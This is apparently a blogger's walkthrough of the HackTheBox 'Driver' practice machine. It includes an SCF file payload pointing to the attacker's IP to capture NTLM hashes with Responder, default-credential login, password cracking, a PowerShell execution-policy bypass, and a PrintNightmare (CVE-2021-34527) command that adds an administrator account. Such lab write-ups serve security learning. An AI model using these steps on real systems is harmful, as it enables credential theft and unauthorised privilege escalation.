Where Notes Work
DRIVER – HACKTHEBOX
This is the write-up/Walkthrough of the DRIVER Machine from Hackthebox.
nmap scan:
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Visited port 80, asked for a username and password, tried logged in as admin:admin and it’s works after that, got the printer update firmware portal, which allows us to upload the firmware, looking for how can I exploit this, found an article about scf file attacks, click here to read.
Open responder in linux
sudo responder -I tun0
after that modify the payload, got from that website for scf file attacks
[Shell]
Command=2
IconFile=\\YOUR-TUNNEL-IP\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
after that, uploaded the okay.scf file to the portal, selecting any user and submit it, after that i got the tony user ntlm hash.
using john, crack the password, and used evil-winrm to connect to user tony and got the user flag.
after that, I found PowerShellConsole history on Tony user directory, On history, there was a command to add a printer with a specific Driver name, searching for that name, looking for exploit found, and Privilege Escalation vector.
I tried doing it using Metasploit, but it was not working, showing that “[-] Exploit aborted due to failure: bad-config: The payload should use the same architecture as the target driver”, I tried both x64 and x86 payload, but that error was from Metasploit, I think, looking forward as I know this PC is well configured for printer services, checking for the process found that spoolsv process is also running, I already know about this exploit which uses printer and spoolsv, I tried that exploit and it works, and I got the administrator.
Link to exploit: https://github.com/JohnHammond/CVE-2021-34527
Loading the script is disabled, so I have to bypass the restriction using Powershell
Get-ExecutionPolicy
Set-ExecutionPolicy bypass process
#Loading the script
. .\CVE-2021-34527.ps1
after that, added new user to directly as administrator group using this exploit.
Invoke-Nightmare -NewUser "procoder" -NewPassword "Procoder@123" -DriverName "PrintMe"
after that, logged into it as evil-winrm as user procoder, as the user is in Administrators group.
Let me know in the comment section if you face any problem.